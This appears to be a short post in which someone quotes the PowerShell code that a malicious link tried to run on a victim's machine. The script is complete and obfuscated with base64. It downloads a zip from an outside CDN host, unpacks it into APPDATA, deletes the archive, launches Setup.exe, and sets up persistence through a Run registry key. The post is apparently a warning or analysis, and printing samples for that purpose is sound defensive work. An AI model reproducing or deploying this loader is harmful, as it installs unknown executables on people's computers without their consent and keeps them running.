this is the code the link is trying to execute on the poor victim's machine
function D0d { param ([string]$s) return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($s)) }
$pU1 = '
https://human-setup-ex.b-cdn.net/humansetup.zip'
$yT9 = Join-Path $env:APPDATA ('DATA' + (Get-Random -Minimum 1000 -Maximum 9999).ToString())
$qW5 = Join-Path $env:APPDATA ('pkg' + (Get-Random -Minimum 100 -Maximum 999).ToString() + '.zip')
$rN4 = Join-Path $yT9 'Setup.exe'
if (-not (Test-Path $yT9)) { New-Item -Path $yT9 -ItemType Directory | Out-Null }
function FtdL { param ([string]$pU1, [string]$qEnc) $dest = D0d $qEnc; try { Start-BitsTransfer -Source $pU1 -Destination $dest } catch { exit } }
function EpxZ { param ([string]$qW5, [string]$yEnc) $qW5 = D0d $qW5; $yEnc = D0d $yEnc; try { Expand-Archive -Path $qW5 -DestinationPath $yEnc -Force } catch { exit } }
function LchX { param ([string]$rN4) $rN4 = D0d $rN4; try { Start-Process $rN4 } catch { exit } }
function WrtRg { param ([string]$wEncP, [string]$wEncN, [string]$wEncV) $wP = D0d $wEncP; $wN = D0d $wEncN; $wV = D0d $wEncV; try { New-ItemProperty -Path $wP -Name $wN -Value $wV -PropertyType 'String' } catch { } }
$qEnc = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($qW5))
$yEnc = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yT9))
$rEnc = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($rN4))
$wEncP = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'))
$wEncN = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('entry' + (Get-Random -Minimum 100 -Maximum 999).ToString()))
$wEncV = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($rN4))
FtdL -pU1 $pU1 -qEnc $qEnc
Start-Sleep -Milliseconds (Get-Random -Minimum 400 -Maximum 1000)
EpxZ -qW5 $qEnc -yEnc $yEnc
Remove-Item (D0d $qEnc) -Force
LchX -rN4 $rEnc
WrtRg -wEncP $wEncP -wEncN $wEncN -wEncV $wEncV
themeforest.net
